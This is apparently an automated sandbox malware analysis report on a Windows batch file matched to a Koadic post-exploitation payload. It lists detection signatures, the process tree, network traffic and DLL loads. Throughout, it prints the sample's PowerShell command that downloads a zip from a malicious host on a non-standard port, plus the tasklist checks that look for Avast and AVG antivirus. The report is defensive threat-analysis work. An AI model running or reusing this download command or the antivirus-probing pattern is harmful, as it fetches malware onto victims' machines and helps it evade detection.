Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
txt2.bat

Overview

General Information

Sample name:txt2.bat
Analysis ID:1554979
MD5:20c44e3a38bcacfb2c8031da775e2ae0
SHA1:8cbe23f3a4f398d605d0e0555b1fa8b7fde08572
SHA256:ca4230d9cfaed1e30718b8d2424452c89b3ef062ec5057d1a15185e58407440e
Tags:batkendychop-shopuser-JAMESWT_MHT
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found large BAT file
Suspicious powershell command line found
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7624 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\txt2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7716 cmdline: tasklist /FI "IMAGENAME eq AvastUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • find.exe (PID: 7728 cmdline: find /i "AvastUI.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • tasklist.exe (PID: 7764 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • find.exe (PID: 7772 cmdline: find /i "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • powershell.exe (PID: 7812 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
txt2.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x5d:$s2: :~22,1%%
  • 0x6a:$s2: :~32,1%%
  • 0x77:$s2: :~27,1%%
  • 0x84:$s2: :~28,1%%
  • 0x91:$s2: :~16,1%%
  • 0x9e:$s2: :~55,1%%
  • 0xab:$s2: :~16,1%%
  • 0xb8:$s2: :~41,1%%
  • 0xc5:$s2: :~41,1%
  • 0xd4:$s2: :~57,1%%
  • 0xe1:$s2: :~32,1%%
  • 0xee:$s2: :~35,1%%
  • 0xfb:$s2: :~49,1%%
  • 0x108:$s2: :~16,1%%
  • 0x115:$s2: :~27,1%%
  • 0x122:$s2: :~6,1%%
  • 0x12e:$s2: :~49,1%
  • 0x141:$s2: :~55,1%%
  • 0x14e:$s2: :~12,1%%
  • 0x15b:$s2: :~28,1%%

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\txt2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 7812, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\txt2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 7812, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\txt2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 7812, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-13T09:42:31.782697+010020229301A Network Trojan was detected4.245.163.56443192.168.2.749781TCP
2024-11-13T09:43:00.489134+010020229301A Network Trojan was detected4.245.163.56443192.168.2.755131TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://kendychop.shop:9135/FTSP.zipAvira URL Cloud: Label: malware
Source: http://kendychop.shop:9135/FTSP.zipHOMEDRDAvira URL Cloud: Label: phishing
Source: http://kendychop.shop:9135/FTSP.zip?Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:9135/bab.zipAvira URL Cloud: Label: malware
Source: http://kendychop.shop:9135/bab.zip(Avira URL Cloud: Label: phishing
Source: http://kendychop.shopAvira URL Cloud: Label: phishing
Source: http://kendychop.shop:9135/FTSP.zipyoAvira URL Cloud: Label: phishing
Source: http://kendychop.shop:9135/bab.zipXAvira URL Cloud: Label: phishing
Source: http://kendychop.shop:9135/bab.zipt9Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:9135/FTSP.zipHOMEDRIVE=C:HOMEPATH=Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:9135Avira URL Cloud: Label: phishing
Source: txt2.batVirustotal: Detection: 11%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb-D source: powershell.exe, 00000007.00000002.1480562612.00000169F041B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbE}1` source: powershell.exe, 00000007.00000002.1480562612.00000169F03F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F0640000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbgo source: powershell.exe, 00000007.00000002.1482022548.00000169F061A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: y.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F0633000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000007.00000002.1480562612.00000169F0373000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.1480562612.00000169F03F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F061A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1478677710.00000169EE3CD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbk source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5 source: powershell.exe, 00000007.00000002.1480562612.00000169F0373000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbl source: powershell.exe, 00000007.00000002.1482022548.00000169F0640000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbJ source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbE source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F0640000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F0640000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 9135
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 9135
Source: global trafficTCP traffic: 192.168.2.7:49764 -> 154.216.17.175:9135
Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49781
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:55131
Source: global trafficHTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kendychop.shop:9135Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kendychop.shop:9135Connection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kendychop.shop:9135Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kendychop.shop:9135Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: global trafficDNS traffic detected: DNS query: kendychop.shop
Source: powershell.exe, 00000007.00000002.1460447040.00000169815F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop
Source: powershell.exe, 00000007.00000002.1460447040.000001698117D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1460447040.00000169815F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:9135
Source: powershell.exe, 00000007.00000002.1478677710.00000169EE347000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1478677710.00000169EE3CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1478677710.00000169EE360000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1480000178.00000169EFEE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1479669330.00000169EE574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:9135/FTSP.zip
Source: powershell.exe, 00000007.00000002.1478677710.00000169EE347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:9135/FTSP.zip?
Source: powershell.exe, 00000007.00000002.1482022548.00000169F0640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:9135/FTSP.zipHOMEDRD
Source: powershell.exe, 00000007.00000002.1479669330.00000169EE576000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1480000178.00000169EFEE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1479669330.00000169EE574000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1480562612.00000169F0401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:9135/FTSP.zipHOMEDRIVE=C:HOMEPATH=
Source: powershell.exe, 00000007.00000002.1482022548.00000169F061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:9135/FTSP.zipyo
Source: powershell.exe, 00000007.00000002.1479669330.00000169EE574000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1460447040.000001698117D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:9135/bab.zip
Source: powershell.exe, 00000007.00000002.1480562612.00000169F0401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:9135/bab.zip(
Source: powershell.exe, 00000007.00000002.1480000178.00000169EFEE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:9135/bab.zipX
Source: powershell.exe, 00000007.00000002.1478677710.00000169EE360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:9135/bab.zipt9
Source: powershell.exe, 00000007.00000002.1460447040.00000169818F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1475774655.00000169901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1475774655.000001699007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1460447040.0000016981872000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1460447040.0000016980001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000007.00000002.1460447040.0000016981872000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.1460447040.0000016981872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlp
Source: powershell.exe, 00000007.00000002.1460447040.0000016980001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.1475774655.000001699007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.1475774655.000001699007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.1475774655.000001699007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.1460447040.0000016981872000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.1460447040.000001698117D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.1460447040.00000169818F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1475774655.00000169901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1475774655.000001699007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

System Summary

barindex
Source: txt2.bat, type: SAMPLEMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: txt2.batStatic file information: 15728640
Source: txt2.bat, type: SAMPLEMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: classification engineClassification label: mal80.troj.winBAT@12/3@2/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5jkabwo.rvt.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\txt2.bat" "
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: txt2.batVirustotal: Detection: 11%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\txt2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
